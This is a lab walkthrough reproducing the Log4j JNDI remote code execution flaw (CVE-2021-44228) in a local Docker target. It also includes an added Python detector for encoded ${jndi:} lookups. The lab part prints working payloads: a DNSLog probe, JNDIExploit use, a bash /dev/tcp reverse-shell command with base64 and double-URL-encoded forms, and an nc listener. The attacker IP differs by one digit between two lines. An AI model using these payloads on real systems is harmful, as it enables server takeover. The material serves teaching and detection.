# Apache Log4j remote command execution (CVE-2021-44228)

## Vulnerability overview

Apache Log4j2 is a Java logging framework that is widely used in business application development. On 24 November 2021, the Alibaba Cloud security team reported the Apache Log4j2 remote code execution vulnerability (CVE-2021-44228) to Apache.

The vulnerability is triggered through Log4j2's Lookup feature. Lookups are enabled by default and are used to substitute special values into log messages. JNDI is one of the supported lookups, and because the lookup places no restriction on the JNDI content it loads, an attacker who can get a crafted string into a logged message can use JNDI injection to make the application load a malicious class from a remote server, resulting in RCE (remote code execution).

## Affected versions

Apache Log4j 2.x < 2.15.0-rc2
## Environment setup

```shell
docker pull vulfocus/log4j2-rce-2021-12-09   # pull the vulnerable image
```

![screenshot: docker pull](https://images2.imgbox.com/19/ef/6J3XFGrU_o.png)

```shell
docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09   # start the environment
```

![screenshot: docker run](https://images2.imgbox.com/cf/70/6IQxF3Ph_o.png)
## Reproduction

### DNSLog callback

Visit: http://192.168.99.100:38080/hello

![screenshot: /hello page](https://images2.imgbox.com/4e/57/PknVxjlX_o.png)

Capture the request with Burp Suite:

![screenshot: captured request](https://images2.imgbox.com/62/76/XZWTWbL0_o.png)

Right-click and change the request method:

![screenshot: change request method](https://images2.imgbox.com/0e/69/LsddaVd0_o.png)

The request becomes:
```http
POST /hello HTTP/1.1
Host: 192.168.99.100:38080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```
Payload: `${jndi:ldap://xxx.dnslog.cn/exp}`

The one used here: `${jndi:ldap://29l3ni.dnslog.cn/exp}`

Add it to the request:
```http
POST /hello HTTP/1.1
Host: 192.168.99.100:38080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

payload=${jndi:ldap://29l3ni.dnslog.cn/exp}
```
Click Send and check the DNSLog record:

![screenshot: DNSLog callback](https://images2.imgbox.com/a8/3c/6MQAfy47_o.png)

The callback arrived, which confirms the vulnerability is present.
### Reverse shell

Tool used: https://github.com/zzwlpx/JNDIExploit.git

Download it on Kali:

```shell
git clone https://github.com/zzwlpx/JNDIExploit.git
```

Run the following to start the service:

```shell
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.99.121   # attacker IP
```

Reverse shell command:

```shell
bash -i >& /dev/tcp/192.169.99.121/4444 0>&1
```
Initial request:

```http
POST /hello HTTP/1.1
Host: 192.168.99.100:38080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```
Payload format: `${jndi:ldap://192.168.99.121:1389/TomcatBypass/Command/Base64/[encoded reverse shell command]}`

Transformation 1: base64-encode the command:

```
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY5Ljk5LjEyMS80NDQ0IDA+JjE=
```

Transformation 2: URL-encode the result (note: choose the "URL-encode key characters" option here):

```
YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xOTIuMTY5Ljk5LjEyMS80NDQ0IDA%2bJjE%3d
```

![screenshot: URL encoding](https://images2.imgbox.com/1e/07/o72hAWFA_o.png)

Transformation 3: URL-encode it a second time (again with "URL-encode key characters"):

```
YmFzaCAtaSA%252bJiAvZGV2L3RjcC8xOTIuMTY5Ljk5LjEyMS80NDQ0IDA%252bJjE%253d
```

With the payload added, the request becomes:
```http
POST /hello HTTP/1.1
Host: 192.168.99.100:38080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

payload=${jndi:ldap://192.168.99.121:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%252bJiAvZGV2L3RjcC8xOTIuMTY5Ljk5LjEyMS80NDQ0IDA%252bJjE%253d}
```
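The two requests above show why a naive rule that greps for the literal `${jndi:` string is unreliable: the lookup only has to be intact by the time the application logs it, so the interesting part of the payload can arrive URL-encoded once or twice and still work. The detector below is an added example written for this write-up (it is not code from the original post, nor from the JNDIExploit or Vulfocus projects). It percent-decodes a raw HTTP request a bounded number of times, matches `${jndi:<scheme>://<host>...}` in the request line, every header value and the body, reports the lookup host for blocking or triage, and, when the path carries a `/Command/Base64/` segment like the one above, decodes it so an analyst can see what the request was meant to run. It covers both the DNSLog request and the reverse-shell request; the sample requests are constructed from the post's own values with most headers trimmed, and scanning every header is the detector's own generalisation (the post only places the payload in the form body).

```python
import base64
import binascii
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote

# The post shows the payload URL-encoded once and twice; a bound of three
# passes covers both with one to spare and avoids looping on odd input.
MAX_DECODE_ROUNDS = 3

# `${jndi:<scheme>://<host>[:port]<path>}`, whitespace tolerated, closing
# brace optional so a truncated log line still matches.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)://(?P<host>[^/}\s]+)(?P<path>[^}\s]*)\}?",
    re.IGNORECASE,
)


def decode_layers(value: str, max_rounds: int = MAX_DECODE_ROUNDS) -> Tuple[str, int]:
    """Percent-decode until the text stops changing; return (text, rounds used).

    `unquote` rather than `unquote_plus` on purpose: the base64 in the post
    contains a literal '+' that must not be turned into a space.
    """
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def decode_base64_segment(path: str) -> Optional[str]:
    """Decode the data after a `/Base64/` segment (the JNDIExploit-style
    `/Command/Base64/<data>` path) for triage; None if absent or invalid."""
    marker = "/Base64/"
    idx = path.find(marker)
    if idx == -1:
        return None
    try:
        return base64.b64decode(path[idx + len(marker):], validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def find_jndi_lookups(text: str) -> List[Dict]:
    """One finding per `${jndi:...}` lookup present after decoding."""
    decoded, rounds = decode_layers(text)
    findings = []
    for m in JNDI_RE.finditer(decoded):
        findings.append({
            "scheme": m.group("scheme").lower(),  # ldap in the post
            "host": m.group("host"),              # candidate block-list entry
            "decode_rounds": rounds,              # 0 plain, 1 single-, 2 double-encoded
            "command": decode_base64_segment(m.group("path")),
        })
    return findings


def scan_http_request(raw: str) -> List[Dict]:
    """Scan the request line, every header value and the body of a raw request.

    Any string the application logs is a sink, so headers are checked too;
    that is this example's generalisation, not something the post shows.
    """
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.splitlines()
    locations = [("request-line", lines[0] if lines else "")]
    for header in lines[1:]:
        name, sep, value = header.partition(":")
        if sep:
            locations.append((name.strip(), value.strip()))
    locations.append(("body", body))
    return [{"location": loc, **f} for loc, text in locations for f in find_jndi_lookups(text)]


# Constructed samples built from the post's values (headers trimmed).
REQUEST_DNSLOG = (
    "POST /hello HTTP/1.1\nHost: 192.168.99.100:38080\n"
    "Content-Type: application/x-www-form-urlencoded\n\n"
    "payload=${jndi:ldap://29l3ni.dnslog.cn/exp}"
)
REQUEST_DOUBLE_ENCODED = (
    "POST /hello HTTP/1.1\nHost: 192.168.99.100:38080\n"
    "Content-Type: application/x-www-form-urlencoded\n\n"
    "payload=${jndi:ldap://192.168.99.121:1389/TomcatBypass/Command/Base64/"
    "YmFzaCAtaSA%252bJiAvZGV2L3RjcC8xOTIuMTY5Ljk5LjEyMS80NDQ0IDA%252bJjE%253d}"
)
REQUEST_BENIGN = (
    "POST /hello HTTP/1.1\nHost: 192.168.99.100:38080\n"
    "Content-Type: application/x-www-form-urlencoded\n\n"
    "payload=hello%20world"
)

if __name__ == "__main__":
    for name, req in [("dnslog", REQUEST_DNSLOG),
                      ("double-encoded", REQUEST_DOUBLE_ENCODED),
                      ("benign", REQUEST_BENIGN)]:
        print(name, scan_http_request(req))
```

Run it directly to see the three classifications: the DNSLog request yields a finding with `decode_rounds` 0 and no command, the reverse-shell request yields one with `decode_rounds` 2 and the decoded `bash -i` command, and the benign request yields nothing. In a proxy or access-log pipeline the same `scan_http_request` can be fed each request; a non-zero `decode_rounds` is itself worth attention, since legitimate form data is rarely percent-encoded more than once. Detection like this is only a compensating control: the fix for a deployment in the affected range is to upgrade Log4j past it.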
Start a listener:

```shell
nc -lvvp 4444
```

![screenshot: nc listener](https://images2.imgbox.com/6c/46/cMOuS8JP_o.png)

Click Send:

![screenshot: reverse shell received](https://images2.imgbox.com/fc/7d/2KE31X56_o.png)

Reverse shell obtained!

For learning purposes only!